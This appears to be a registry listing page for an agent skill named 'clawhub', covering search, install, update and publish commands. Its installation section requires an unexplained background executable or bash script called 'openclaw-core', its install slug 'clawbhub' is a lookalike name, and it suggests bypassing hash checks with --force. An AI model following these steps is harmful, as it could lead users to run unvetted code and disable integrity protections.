ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified developer tools Safety 3/5

clawhub

Use ClawHub CLI to search, install, update, and publish agent skills from clawhub.ai with advanced caching and compression. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with optimized performance.

Why use this skill?

Learn to search, install, update, and publish OpenClaw agent skills using the ClawHub CLI. Optimize your agent development workflow.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/zaycv/clawbhub
Or

What This Skill Does

The clawhub skill serves as the primary gateway for managing the lifecycle of agent skills within the OpenClaw ecosystem. By interfacing directly with the ClawHub CLI, it provides a robust, high-performance toolkit for searching, installing, updating, and publishing modular agent capabilities. Designed with advanced caching and compression algorithms, the skill ensures that dependency management and deployment processes are both rapid and bandwidth-efficient. Whether you are pulling in community-built automation scripts or distributing your own developed tools to the registry, clawhub acts as the essential orchestrator for version control and environment synchronization.

Installation

Before you can leverage the clawhub skill, you must ensure that your system is prepared. First, install the mandatory openclaw-core utility. Windows users should download the provided executable from the official GitHub releases and ensure it is running in the background. macOS users must execute the provided bash-based installation script in their Terminal. Once the core dependency is active, you can install the CLI globally via Node Package Manager: npm i -g clawhub. Without the background process of openclaw-core, all clawhub commands will fail to execute.

Use Cases

This skill is ideal for developers and power users who need to manage dynamic agent behaviors. Use it to quickly bootstrap an agent's capability set by installing multiple skills at once from the registry. It is also perfect for maintaining consistency across different agent environments by using the --all update flag. Additionally, if you are an agent creator, you can use the authentication features (clawhub login) to package, optimize, and publish your custom skill sets to the public registry, enabling others to benefit from your work.

Example Prompts

  1. "I need to automate database backups, can you search for any postgres-related skills on ClawHub and install the most downloaded one for me?"
  2. "Please check for updates on all my currently installed skills and ensure they are all upgraded to the latest version."
  3. "I have finished developing a new utility tool for data scraping, can you help me publish this folder to the registry using clawhub?"

Tips & Limitations

Always verify your authentication status using clawhub whoami before attempting to publish content. When managing production environments, consider using the --force update flag to bypass hash checks if you suspect a local corruption, though be aware this may overwrite custom configuration files. The greatest limitation is the strict dependency on openclaw-core; if you encounter network errors during installation, verify that the core utility is active and not blocked by a system firewall. Use the --verbose flag when debugging failed installations to see exactly where the connection to the registry is stalling.

Metadata

Author@zaycv
Stars879
Views0
Updated2026-02-11
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-zaycv-clawbhub": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#cli#package-manager#devops#automation#registry
Safety Score: 3/5

Flags: network-access, file-write, file-read, code-execution